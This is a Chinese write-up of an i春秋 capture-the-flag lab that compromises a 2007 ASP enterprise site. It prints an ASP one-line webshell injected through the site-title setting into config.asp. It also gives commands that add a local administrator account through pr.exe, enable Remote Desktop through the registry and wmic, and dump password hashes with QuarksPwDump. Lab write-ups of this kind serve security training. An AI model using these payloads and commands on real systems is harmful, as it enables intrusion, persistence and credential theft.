i春秋_我很简单_解题记录

实验工具： 中国菜刀 Pr 御剑 Pangolin 3389

0x01

拿到靶机环境，根据工具猜想，存在SQL注入漏洞

先用工具扫描一下，打开明小子

工具：旁注WEB综合检测程序Ver3.6修正版
路径：C:\Tools\注入工具\Domain3.6\Domain3.6.exe

sql注入检测一下，顺利爆出管理员用户名和密码

拿去解密一下拿到明文

工具：MD5Cracksp

路径：C:\Tools\破解工具\MD5

0x02

拿到管理员密码登录后台，盲猜后台地址/admin,盲猜成功，嘻嘻嘻

根据提示需要获取webshell，浏览一下管理员界面

找了一会感觉产品图片可能会有利用，然后做了个图片马，结果发现没有上传入口-.-||

找了半天也没发现别的上传入口，实在不行了。看看题解，原来如此简单

配置网站标题，插入一句话木马：

具体实现方式为：

解释一下一句话木马
/inc/config.asp的源码是这样的：
<%
Const SiteName=”魅力企业网站管理系统 2007 中英繁商业正式版”        ‘网站名称
Const EnSiteName=”MSCOM 2007″        ‘网站名称
Const SiteTitle=”魅力软件”        ‘网站标题
Const EnSiteTitle=”MelyySoft”        ‘网站标题
Const SiteUrl=”www.melyysoft.com”        ‘网站地址
Const Miibeian=”湘ICP备05011184号”        ‘网站备案号
….
%>

构造一句话木马：

“%><%Eval Request(Chr(35))%><%’

插入一句话木马后，config.asp代码会变成这样：

<%
Const SiteName=””%><%Eval Request(Chr(35))%><% ‘”        ‘网站名称
Const EnSiteName=”MSCOM 2007″        ‘网站名称
Const SiteTitle=”魅力软件”        ‘网站标题
Const EnSiteTitle=”MelyySoft”        ‘网站标题
Const SiteUrl=”www.melyysoft.com”        ‘网站地址
Const Miibeian=”湘ICP备05011184号”        ‘网站备案号
….
%>

上菜刀，成功进入

配置文件路径就是shell路径，刚才在修改网站信息的时候配置文件路径可以看见

0x03

想要知道管理员密码有很多工具，但是现在写需要权限运行，所以，要提权

嘻嘻嘻，拒绝访问

那就自己上传点好东西

打开虚拟终端切换至目标目录，用pr.exe执行cmd命令，添加账户；
pr “net user qwer 123 /add”，添加成功

提权：
pr “net localgroup administrators qwer /add”  成功提权

 

然后打开3389端口远程连接

打开3389端口的方式有两种

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 

 这里把第一条命令写成bat文件，上传后用pr执行一下，执行成功

0x04

远程桌面连接之后，下一步要获取管理员口令

上传工具getpass，结果只能爆出当前登录管理员口令，虽然是明文的。。。

再试试QuarksPwDump，成功

QuarksPwDump –dump-hash-local

解密一下拿到flag

 

 参考博文：开启 3389 的 cmd 命令

 [在线挑战] i春秋实验《我很简单，请不要欺负我》实验详细攻略